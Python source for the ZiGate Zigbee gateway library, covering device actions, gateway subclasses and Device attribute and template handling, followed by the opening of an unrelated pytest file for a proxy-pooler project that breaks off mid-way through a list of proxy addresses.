@register_actions(ACTIONS_COLOR)
def action_move_colour_rgb(self, addr, endpoint, rgb, transition=0):
'''
move to colour (r,g,b) example : (1.0, 1.0, 1.0)
convenient function to set color in hex format
transition in second
'''
x, y = rgb_to_xy(rgb)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature(self, addr, endpoint, mired, transition=0):
'''
move colour to temperature
mired color temperature
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHH', addr_mode, addr, 1, endpoint,
mired, transition)
return self.send_data(0x00C0, data)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_kelvin(self, addr, endpoint, temperature, transition=0):
'''
move colour to temperature
temperature unit is kelvin
transition in second
convenient function to use kelvin instead of mired
'''
temperature = int(1000000 // temperature)
return self.action_move_temperature(addr, endpoint, temperature, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_rate(self, addr, endpoint, mode, rate, min_mired, max_mired):
'''
move colour temperature in specified rate towards given min or max value
Available modes:
- 0: Stop
- 1: Increase
- 3: Decrease
rate: how many temperature units are moved in one second
min_mired: Minium temperature where decreasing stops in mired
max_mired: Maxium temperature where increasing stops in mired
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBHHH', addr_mode, addr, 1, endpoint, mode, rate, min_mired, max_mired)
return self.send_data(0x00C1, data)
@register_actions(ACTIONS_LOCK)
def action_lock(self, addr, endpoint, lock):
'''
Lock / unlock
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, lock)
return self.send_data(0x00f0, data)
@register_actions(ACTIONS_COVER)
def action_cover(self, addr, endpoint, cmd, param=None):
'''
Open, close, move, ...
cmd could be :
OPEN = 0x00
CLOSE = 0x01
STOP = 0x02
LIFT_VALUE = 0x04
LIFT_PERCENT = 0x05
TILT_VALUE = 0x07
TILT_PERCENT = 0x08
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
fmt = '!B' + addr_fmt + 'BBB'
addr = self.__addr(addr)
args = [addr_mode, addr, 1, endpoint, cmd]
if cmd in (0x04, 0x07):
fmt += 'H'
args.append(param)
elif cmd in (0x05, 0x08):
fmt += 'B'
args.append(param)
data = struct.pack(fmt, *args)
return self.send_data(0x00fa, data)
def raw_aps_data_request(self, addr, src_ep, dst_ep, profile, cluster, payload, addr_mode=2, security=0):
'''
Send raw APS Data request
'''
addr = self.__addr(addr)
length = len(payload)
radius = 0
data = struct.pack('!BHBBHHBBB{}s'.format(length), addr_mode, addr, src_ep, dst_ep,
cluster, profile, security, radius, length, payload)
return self.send_data(0x0530, data)
def set_TX_power(self, percent=100):
'''
Set TX Power between 0-100%
'''
percent = percent * 255 // 100
data = struct.pack('!B', percent)
return self.send_data(0x0806, data)
def get_TX_power(self):
'''
Get TX Power
'''
return self.send_data(0x0807, wait_response=0x8807)
def start_mqtt_broker(self, host='localhost:1883', username=None, password=None):
'''
Start a MQTT broker in a new thread
'''
from .mqtt_broker import MQTT_Broker
broker = MQTT_Broker(self, host, username, password)
broker.connect()
self.broker_thread = threading.Thread(target=broker.client.loop_forever,
name='ZiGate-MQTT')
self.broker_thread.setDaemon(True)
self.broker_thread.start()
def generate_templates(self, dirname='~'):
'''
Generate template file for each device
'''
for device in self._devices.values():
device.generate_template(dirname)
class FakeZiGate(ZiGate):
'''
Fake ZiGate for test only without real hardware
'''
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=False, auto_save=False, channel=None, adminpanel=False):
ZiGate.__init__(self, port=port, path=path, auto_start=auto_start, auto_save=auto_save,
channel=channel, adminpanel=adminpanel)
self._addr = '0000'
self._ieee = '0123456789abcdef'
# by default add a fake xiaomi temp sensor on address abcd
device = Device({'addr': 'abcd', 'ieee': '0123456789abcdef'}, self)
device.set_attribute(1, 0, {'attribute': 5, 'lqi': 170, 'data': 'lumi.weather'})
device.load_template()
self._devices['abcd'] = device
def startup(self, channel=None):
ZiGate.startup(self, channel=channel)
self.connection.start_fake_response()
def setup_connection(self):
self.connection = FakeTransport()
class ZiGateGPIO(ZiGate):
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT) # GPIO2
self.set_running_mode()
ZiGate.__init__(self, port=port, path=path, auto_start=auto_start,
auto_save=auto_save, channel=channel, adminpanel=adminpanel)
def set_running_mode(self):
GPIO.output(27, GPIO.HIGH) # GPIO2
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # GPIO0
sleep(0.5)
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO0
sleep(0.5)
def set_bootloader_mode(self):
GPIO.output(27, GPIO.LOW) # GPIO2
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # GPIO0
sleep(0.5)
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO0
sleep(0.5)
def flash_firmware(self, path, erase_eeprom=False):
from .flasher import flash
self.set_bootloader_mode()
flash(self._port, write=path, erase=erase_eeprom)
self.set_running_mode()
def __del__(self):
GPIO.cleanup()
ZiGate.__del__(self)
def setup_connection(self):
self.connection = ThreadSerialConnection(self, self._port, '3f201')
class ZiGateWiFi(ZiGate):
def __init__(self, host, port=None, path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
self._host = host
ZiGate.__init__(self, port=port, path=path,
auto_start=auto_start,
auto_save=auto_save,
channel=channel,
adminpanel=adminpanel
)
def setup_connection(self):
self.connection = ThreadSocketConnection(self, self._host, self._port)
def reboot(self):
'''
ask zigate wifi to reboot
'''
import requests
requests.get('http://{}/reboot'.format(self._host))
class DeviceEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Device):
return obj.to_json()
if isinstance(obj, Cluster):
return obj.to_json()
if isinstance(obj, Response):
return obj.cleaned_data()
elif isinstance(obj, bytes):
return hexlify(obj).decode()
elif isinstance(obj, set):
return list(obj)
elif isinstance(obj, type):
return obj.__name__
return json.JSONEncoder.default(self, obj)
class Device(object):
def __init__(self, info=None, zigate_instance=None):
self._zigate = zigate_instance
self._lock = threading.Lock()
self.info = info or {}
self.endpoints = {}
self._expire_timer = {}
self.missing = False
self.genericType = ''
self.discovery = ''
def _lock_acquire(self):
LOGGER.debug('Acquire Lock on device %s', self)
r = self._lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock on device %s', self)
def _lock_release(self):
LOGGER.debug('Release Lock on device %s', self)
if not self._lock.locked():
LOGGER.error('Device Lock not locked for device %s !', self)
else:
self._lock.release()
def available_actions(self, endpoint_id=None):
'''
Analyse specified endpoint to found available actions
actions are:
- onoff
- move
- lock
- ...
'''
actions = {}
if not endpoint_id:
endpoint_id = list(self.endpoints.keys())
if not isinstance(endpoint_id, list):
endpoint_id = [endpoint_id]
for ep_id in endpoint_id:
actions[ep_id] = []
endpoint = self.endpoints.get(ep_id)
if endpoint:
# some light have device=0 so try to work around
if endpoint['device'] in ACTUATORS or (endpoint['device'] == 0 and self.receiver_on_when_idle()):
if 0x0006 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_ONOFF)
if 0x0008 in endpoint['in_clusters'] and endpoint['device'] != 0x010a:
# except device 0x010a because Tradfri Outlet don't have level control
# but still have endpoint 8...
actions[ep_id].append(ACTIONS_LEVEL)
if 0x0101 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_LOCK)
if 0x0102 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_COVER)
if 0x0201 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_THERMOSTAT)
if 0x0300 in endpoint['in_clusters']:
# if endpoint['device'] in (0x0102, 0x0105):
if endpoint['device'] in (0x0105,):
actions[ep_id].append(ACTIONS_HUE)
elif endpoint['device'] in (0x010D, 0x0210):
actions[ep_id].append(ACTIONS_COLOR)
actions[ep_id].append(ACTIONS_HUE)
actions[ep_id].append(ACTIONS_TEMPERATURE)
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
actions[ep_id].append(ACTIONS_TEMPERATURE)
else: # 0x0200
actions[ep_id].append(ACTIONS_COLOR)
actions[ep_id].append(ACTIONS_HUE)
return actions
def _create_actions(self):
'''
create convenient functions for actions
'''
a_actions = self.available_actions()
for endpoint_id, actions in a_actions.items():
for action in actions:
for func_name in ACTIONS.get(action, []):
func = getattr(self._zigate, func_name)
wfunc = functools.partial(func, self.addr, endpoint_id)
functools.update_wrapper(wfunc, func)
setattr(self, func_name, wfunc)
def _bind_report(self, enpoint_id=None):
'''
automatically bind and report data
'''
if not BIND_REPORT:
return
if enpoint_id:
endpoints_list = [(enpoint_id, self.endpoints[enpoint_id])]
else:
endpoints_list = list(self.endpoints.items())
LOGGER.debug('Start automagic bind and report process for device %s', self)
for endpoint_id, endpoint in endpoints_list:
# if endpoint['device'] in ACTUATORS: # light
LOGGER.debug('Bind and report endpoint %s for device %s', endpoint_id, self)
if 0x0001 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0001')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0001)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0001, (0x0020, 0x20))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0001, (0x0021, 0x20))
if 0x0006 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0006')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0006)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0006, (0x0000, 0x10))
if 0x0008 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0008')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0008)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0008, (0x0000, 0x20))
if 0x000f in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x000f')
self._zigate.bind_addr(self.addr, endpoint_id, 0x000f)
self._zigate.reporting_request(self.addr, endpoint_id,
0x000f, (0x0055, 0x10))
if 0x0102 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0102')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0102)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0102, (0x0007, 0x20))
if 0x0201 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0201')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0201)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0000, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0002, 0x18))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0008, 0x20))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0012, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0014, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x001C, 0x30))
if 0x0300 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0300')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
if endpoint['device'] in (0x0105,):
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
elif endpoint['device'] in (0x010D, 0x0210):
# self._zigate.reporting_request(self.addr,
# endpoint_id,
# 0x0300, [(0x0000, 0x20),
# (0x0001, 0x20),
# (0x0003, 0x21),
# (0x0004, 0x21),
# (0x0007, 0x21),
# ])
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0003, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0004, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0007, 0x21))
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0007, 0x21))
else: # 0x0200
# self._zigate.reporting_request(self.addr,
# endpoint_id,
# 0x0300, [(0x0000, 0x20),
# (0x0001, 0x20),
# (0x0003, 0x21),
# (0x0004, 0x21),
# ])
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0003, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0004, 0x21))
if 0xFC00 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0xFC00')
self._zigate.bind_addr(self.addr, endpoint_id, 0xFC00)
if 0x0702 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0x0702')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0702)
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0702, (0x0000, 0x25))
@staticmethod
def from_json(data, zigate_instance=None):
d = Device(zigate_instance=zigate_instance)
d.info = data.get('info', {})
d.genericType = data.get('generictype', '')
d.discovery = data.get('discovery', '')
for ep in data.get('endpoints', []):
if 'attributes' in ep: # old version
LOGGER.debug('Old version found, convert it')
for attribute in ep['attributes'].values():
endpoint_id = attribute['endpoint']
cluster_id = attribute['cluster']
data = {'attribute': attribute['attribute'],
'data': attribute['data'],
}
d.set_attribute(endpoint_id, cluster_id, data)
else:
endpoint = d.get_endpoint(ep['endpoint'])
endpoint['profile'] = ep.get('profile', 0)
endpoint['device'] = ep.get('device', 0)
endpoint['in_clusters'] = ep.get('in_clusters', [])
endpoint['out_clusters'] = ep.get('out_clusters', [])
for cl in ep['clusters']:
cluster = Cluster.from_json(cl, endpoint, d)
endpoint['clusters'][cluster.cluster_id] = cluster
if 'power_source' in d.info: # old version
d.info['power_type'] = d.info.pop('power_source')
if 'manufacturer' in d.info: # old version
d.info['manufacturer_code'] = d.info.pop('manufacturer')
if 'rssi' in d.info: # old version
d.info['lqi'] = d.info.pop('rssi')
d._avoid_duplicate()
return d
def to_json(self, properties=False):
r = {'addr': self.addr,
'info': self.info,
'endpoints': [{'endpoint': k,
'clusters': list(v['clusters'].values()),
'profile': v['profile'],
'device': v['device'],
'in_clusters': v['in_clusters'],
'out_clusters': v['out_clusters']
} for k, v in self.endpoints.items()],
'generictype': self.genericType,
'discovery': self.discovery
}
if properties:
r['properties'] = list(self.properties)
return r
def __str__(self):
name = self.get_property_value('type', '')
manufacturer = self.get_property_value('manufacturer', 'Device')
return '{} {} ({}) {}'.format(manufacturer, name, self.info.get('addr'), self.info.get('ieee'))
def __repr__(self):
return self.__str__()
@property
def addr(self):
return self.info['addr']
@property
def ieee(self):
ieee = self.info.get('ieee')
if ieee is None:
LOGGER.error('IEEE is missing for %s, please pair it again !', self.addr)
return ieee
@property
def rssi(self): # compat
return self.lqi
@rssi.setter
def rssi(self, value): # compat
self.lqi = value
@property
def lqi(self):
return self.info.get('lqi', 0)
@lqi.setter
def lqi(self, value):
self.info['lqi'] = value
@property
def last_seen(self):
return self.info.get('last_seen')
@property
def battery_percent(self):
percent = self.get_property_value('battery_percent')
if not percent:
percent = 100
if self.info.get('power_type') == 0:
power_source = self.get_property_value('power_source')
if power_source is None:
power_source = 3
battery_voltage = self.get_property_value('battery_voltage')
if power_source == 3: # battery
power_source = 3.1
if power_source and battery_voltage:
power_end = 0.9 * power_source
percent = (battery_voltage - power_end) * 100 / (power_source - power_end)
if percent > 100:
percent = 100
return percent
@property
def rssi_percent(self): # compat
return self.lqi_percent
@property
def lqi_percent(self):
return round(100 * self.lqi / 255)
def get_type(self, wait=True):
typ = self.get_value('type')
if typ is None:
for endpoint in self.endpoints:
if 0 in self.endpoints[endpoint]['in_clusters'] or not self.endpoints[endpoint]['in_clusters']:
self._zigate.read_attribute_request(self.addr,
endpoint,
0x0000,
[0x0004, 0x0005]
)
if 0 in self.endpoints[endpoint]['in_clusters']:
break
if not wait or not self.endpoints:
return
# wait for type
t1 = time()
while self.get_value('type') is None:
sleep(0.01)
t2 = time()
if t2 - t1 > WAIT_TIMEOUT:
LOGGER.warning('No response waiting for type')
return
typ = self.get_value('type')
return typ
def refresh_device(self, full=False):
to_read = {}
if full:
for attribute in self.attributes:
k = (attribute['endpoint'], attribute['cluster'])
if k not in to_read:
to_read[k] = []
to_read[k].append(attribute['attribute'])
else:
endpoints_list = list(self.endpoints.items())
for endpoint_id, endpoint in endpoints_list:
if 0x0006 in endpoint['in_clusters']:
k = (endpoint_id, 0x0006)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
if 0x0008 in endpoint['in_clusters']:
k = (endpoint_id, 0x0008)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
if 0x000f in endpoint['in_clusters']:
k = (endpoint_id, 0x000f)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0055)
if 0x0102 in endpoint['in_clusters']:
k = (endpoint_id, 0x0102)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0007)
if 0x0201 in endpoint['in_clusters']:
k = (endpoint_id, 0x0201)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
to_read[k].append(0x0002)
to_read[k].append(0x0008)
to_read[k].append(0x0012)
to_read[k].append(0x0014)
to_read[k].append(0x001C)
if 0x0300 in endpoint['in_clusters']:
k = (endpoint_id, 0x0300)
if k not in to_read:
to_read[k] = []
self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
if endpoint['device'] in (0x0105,):
to_read[k].append(0x0000)
to_read[k].append(0x0001)
elif endpoint['device'] in (0x010D, 0x0210):
to_read[k].append(0x0000)
to_read[k].append(0x0001)
to_read[k].append(0x0003)
to_read[k].append(0x0004)
to_read[k].append(0x0007)
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
to_read[k].append(0x0007)
else: # 0x0200
to_read[k].append(0x0000)
to_read[k].append(0x0001)
to_read[k].append(0x0003)
to_read[k].append(0x0004)
if 0x0702 in endpoint['in_clusters']:
k = (endpoint_id, 0x0702)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
for k, attributes in to_read.items():
endpoint, cluster = k
self._zigate.read_attribute_request(self.addr,
endpoint,
cluster,
attributes)
def discover_device(self):
self._zigate.discover_device(self.addr)
def identify_device(self, time_sec=5):
'''
send identify command
sec is time in second
'''
ep = list(self.endpoints.keys())
ep.sort()
if ep:
endpoint = ep[0]
else:
endpoint = 1
self._zigate.identify_send(self.addr, endpoint, time_sec)
def __setitem__(self, key, value):
self.info[key] = value
def __getitem__(self, key):
return self.info[key]
def __delitem__(self, key):
return self.info.__delitem__(key)
def get(self, key, default):
return self.info.get(key, default)
def __contains__(self, key):
return self.info.__contains__(key)
def __len__(self):
return len(self.info)
def __iter__(self):
return self.info.__iter__()
def items(self):
return self.info.items()
def keys(self):
return self.info.keys()
# def __getattr__(self, attr):
# return self.info[attr]
def update(self, device):
'''
update from other device
'''
self._lock_acquire()
self.info.update(device.info)
self._merge_endpoints(device.endpoints)
self.genericType = self.genericType or device.genericType
# self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self._lock_release()
def _merge_endpoints(self, endpoints):
for endpoint_id, endpoint in endpoints.items():
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = endpoint
else:
myendpoint = self.endpoints[endpoint_id]
if 'clusters' not in myendpoint:
myendpoint['clusters'] = {}
myendpoint['profile'] = endpoint.get('profile') or myendpoint.get('profile', 0)
myendpoint['device'] = endpoint.get('device') or myendpoint.get('device', 0)
myendpoint['in_clusters'] = endpoint.get('in_clusters') or myendpoint.get('in_clusters', [])
myendpoint['out_clusters'] = endpoint.get('out_clusters') or myendpoint.get('out_clusters', [])
for cluster_id, cluster in endpoint['clusters'].items():
if cluster_id not in myendpoint['clusters']:
myendpoint['clusters'][cluster_id] = cluster
else:
mycluster = myendpoint['clusters'][cluster_id]
for attribute in cluster.attributes.values():
mycluster.update(attribute)
def update_info(self, info):
self._lock_acquire()
self.info.update(info)
self._lock_release()
def get_endpoint(self, endpoint_id):
self._lock_acquire()
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = {'clusters': {},
'profile': 0,
'device': 0,
'in_clusters': [],
'out_clusters': [],
}
self._lock_release()
return self.endpoints[endpoint_id]
def get_cluster(self, endpoint_id, cluster_id):
endpoint = self.get_endpoint(endpoint_id)
self._lock_acquire()
if cluster_id not in endpoint['clusters']:
cluster = get_cluster(cluster_id, endpoint, self)
endpoint['clusters'][cluster_id] = cluster
self._lock_release()
return endpoint['clusters'][cluster_id]
def set_attribute(self, endpoint_id, cluster_id, data):
added = False
lqi = data.pop('lqi', 0)
if lqi > 0:
self.info['lqi'] = lqi
self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self.missing = False
cluster = self.get_cluster(endpoint_id, cluster_id)
self._lock_acquire()
r = cluster.update(data)
if r:
added, attribute = r
if 'expire' in attribute:
self._set_expire_timer(endpoint_id, cluster_id,
attribute['attribute'],
attribute['expire'])
self._avoid_duplicate()
self._lock_release()
if not r:
return
return added, attribute['attribute']
def _set_expire_timer(self, endpoint_id, cluster_id, attribute_id, expire):
LOGGER.debug('Set expire timer for %s-%s-%s in %s', endpoint_id,
cluster_id,
attribute_id,
expire)
k = (endpoint_id, cluster_id, attribute_id)
timer = self._expire_timer.get(k)
if timer:
LOGGER.debug('Cancel previous Timer %s', timer)
timer.cancel()
timer = threading.Timer(expire,
functools.partial(self._reset_attribute,
endpoint_id,
cluster_id,
attribute_id))
timer.setDaemon(True)
timer.start()
self._expire_timer[k] = timer
def _reset_attribute(self, endpoint_id, cluster_id, attribute_id):
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id)
value = attribute['value']
if 'expire_value' in attribute:
new_value = attribute['expire_value']
elif 'type' in attribute:
new_value = attribute['type']()
else:
new_value = type(value)()
attribute['value'] = new_value
attribute['data'] = new_value
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id,
True)
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self._zigate,
**{'zigate': self._zigate,
'device': self,
'attribute': attribute})
def get_attribute(self, endpoint_id, cluster_id, attribute_id,
extended_info=False):
if endpoint_id in self.endpoints:
endpoint = self.endpoints[endpoint_id]
if cluster_id in endpoint['clusters']:
cluster = endpoint['clusters'][cluster_id]
attribute = cluster.get_attribute(attribute_id)
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id,
'addr': self.addr}
attr.update(attribute)
return attr
return attribute
@property
def attributes(self):
'''
list all attributes including endpoint and cluster id
'''
return self.get_attributes(True)
def get_attributes(self, extended_info=False):
'''
list all attributes
including endpoint and cluster id
'''
attrs = []
endpoints = list(self.endpoints.keys())
endpoints.sort()
for endpoint_id in endpoints:
endpoint = self.endpoints[endpoint_id]
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if extended_info:
attr = {'endpoint': endpoint_id, 'cluster': cluster_id}
attr.update(attribute)
attrs.append(attr)
else:
attrs.append(attribute)
return attrs
def set_attributes(self, attributes):
'''
load list created by attributes()
'''
for attribute in attributes:
endpoint_id = attribute.pop('endpoint')
cluster_id = attribute.pop('cluster')
self.set_attribute(endpoint_id, cluster_id, attribute)
def get_property(self, name, extended_info=False):
'''
return attribute matching name
'''
for endpoint_id, endpoint in self.endpoints.items():
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if attribute.get('name') == name:
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id}
attr.update(attribute)
return attr
return attribute
def get_property_value(self, name, default=None):
'''
return attribute value matching name
'''
prop = self.get_property(name)
if prop:
return prop.get('value', default)
return default
def get_value(self, name, default=None):
'''
return attribute value matching name
shorter alias of get_property_value
'''
return self.get_property_value(name, default)
@property
def properties(self):
'''
return well known attribute list
attribute with friendly name
'''
props = []
for endpoint in self.endpoints.values():
for cluster in endpoint.get('clusters', {}).values():
for attribute in cluster.attributes.values():
if 'name' in attribute:
props.append(attribute)
return props
def receiver_on_when_idle(self):
mac_capability = self.info.get('mac_capability')
if mac_capability:
return mac_capability[-3] == '1'
return False
def need_discovery(self):
'''
return True if device need to be discovered
because of missing important information
'''
need = False
LOGGER.debug('Check Need discovery %s', self)
if not self.discovery:
self.load_template()
if not self.get_property_value('type'):
LOGGER.debug('Need discovery : no type')
need = True
if not self.ieee:
LOGGER.debug('Need discovery : no IEEE')
need = True
if not self.endpoints:
LOGGER.debug('Need discovery : no endpoints')
need = True
for endpoint in self.endpoints.values():
if endpoint.get('device') is None:
LOGGER.debug('Need discovery : no device id')
need = True
if endpoint.get('in_clusters') is None:
LOGGER.debug('Need discovery : no clusters list')
need = True
return need
def _avoid_duplicate(self):
'''
Rename attribute if needed to avoid duplicate
'''
properties = []
for attribute in self.attributes:
if 'name' not in attribute:
continue
if attribute['name'] in properties:
attribute['name'] = '{}{}'.format(attribute['name'],
attribute['endpoint'])
attr = self.get_attribute(attribute['endpoint'],
attribute['cluster'],
attribute['attribute'])
attr['name'] = attribute['name']
properties.append(attribute['name'])
def has_template(self):
typ = self.get_type()
if not typ:
LOGGER.warning('No type (modelIdentifier) for device %s', self.addr)
return
typ = typ.replace(' ', '_')
path = os.path.join(BASE_PATH, 'templates', typ + '.json')
return os.path.exists(path)
def load_template(self):
typ = self.get_type()
if not typ:
LOGGER.warning('No type (modelIdentifier) for device %s', self.addr)
return
typ = typ.replace(' ', '_')
path = os.path.join(BASE_PATH, 'templates', typ + '.json')
success = False
if os.path.exists(path):
try:
with open(path) as fp:
template = json.load(fp)
device = Device.from_json(template)
self.update(device)
success = True
except Exception:
LOGGER.error('Failed to load template for %s', typ)
LOGGER.error(traceback.format_exc())
else:
LOGGER.debug('No template found for %s', typ)
if self.need_report:
self._bind_report()
if success:
self.discovery = 'templated'
dispatch_signal(ZIGATE_DEVICE_UPDATED,
self._zigate, **{'zigate': self._zigate,
'device': self})
return success
def generate_template(self, dirname='~'):
'''
Generate template file
'''
typ = self.get_type()
if not typ:
LOGGER.warning('No type (modelIdentifier) for device %s', self.addr)
return
typ = typ.replace(' ', '_')
dirname = os.path.expanduser(dirname)
path = os.path.join(dirname, typ + '.json')
jdata = json.dumps(self, cls=DeviceEncoder)
jdata = json.loads(jdata)
del jdata['addr']
del jdata['discovery']
for key in ('id', 'addr', 'ieee', 'lqi', 'last_seen', 'max_rx', 'max_tx', 'max_buffer'):
if key in jdata['info']:
del jdata['info'][key]
for endpoint in jdata.get('endpoints', []):
for cluster in endpoint.get('clusters', []):
cluster_id = cluster['cluster']
if cluster_id == 0: # we only keep attribute 4, 5, 7 for cluster 0x0000
cluster['attributes'] = [a for a in cluster.get('attributes', [])
if a.get('attribute') in (4, 5, 7)]
for attribute in cluster.get('attributes', []):
keys = list(attribute.keys())
for key in keys:
if key in ('attribute', 'inverse'):
continue
if key == 'data' and cluster_id == 0:
continue
del attribute[key]
with open(path, 'w') as fp:
json.dump(jdata, fp, cls=DeviceEncoder,
sort_keys=True, indent=4, separators=(',', ': '))
@property
def need_report(self):
return self.info.get('need_report', True)
def set_assumed_state(self, assumed_state=True):
self.info['assumed_state'] = assumed_state
@property
def assumed_state(self):
'''
return True if it has assumed state
'''
return self.info.get('assumed_state', False)
@property
def groups(self):
'''
return groups
'''
return self._zigate.get_group_for_addr(self.addr)
|
test_pooler.py
|
import asyncio
import os
import signal
import ssl
from multiprocessing import Process
from random import randint
from time import sleep
from unittest.mock import Mock
import aiohttp
import pytest
import requests
from proxypooler import config
from proxypooler.pooler import ProxyPooler
from proxypooler.ext import serial, deserial
srv = pytest.mark.skipif(
not pytest.config.getoption("--runsrv"),
reason="need --runsrv option to run"
)
if config.ssl_on:
HOST = 'https://localhost:8090'
else:
HOST = 'http://localhost:8090'
MAXSIZE = 10**5
@pytest.fixture
def clear(conn):
yield
conn.get_list(MAXSIZE)
@pytest.fixture
def ssl_context():
if config.ssl_on:
# context = ssl.SSLContext()
# context.load_cert_chain(CERT, KEY)
# context.load_verify_locations(CA_CRT)
# context.verify_mode = ssl.CERT_REQUIRED
# return context
return ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH,
cafile=config.ca_crt)
else:
return None
@pytest.fixture(scope='function')
def pooler(conn, clear):
p = ProxyPooler(saver=conn)
proc = Process(target=p.start)
yield p, proc
os.kill(proc.pid, signal.SIGINT)
proc.join()
@pytest.fixture
def proxy(pooler):
def send_request():
host = 'http://localhost:8088'
count = requests.get('{}/proxies/count'.format(host)).json()['count']
proxy = requests.get('{}/proxies/{}'.format(host, count)).json()['proxies']
return count, proxy
proxy = ["123.163.166.209:808", "175.155.24.9:808", "119.5.1.5:808",
"115.220.150.191:808", "117.43.0.73:808", "166.111.77.32:80",
"111.13.7.121:80", "125.106.248.222:808", "111.13.2.131:80",
"111.13.7.117:80", "119.5.1.35:808", "124.207.82.166:8008",
"121.69.47.126:8080", "123.125.212.171:8080", "36.249.24.157:808",
"121.232.147.114:9000", "144.12.165.38:808", "218.64.93.47:808",
"117.69.7.173:808", "221.229.46.39:808", "113.58.235.73:808",
"182.39.1.200:808", "58.50.64.15:808", "220.113.26.18:8080",
"117.43.1.187:808", "125.106.249.228:808", "58.253.70.149:8080",
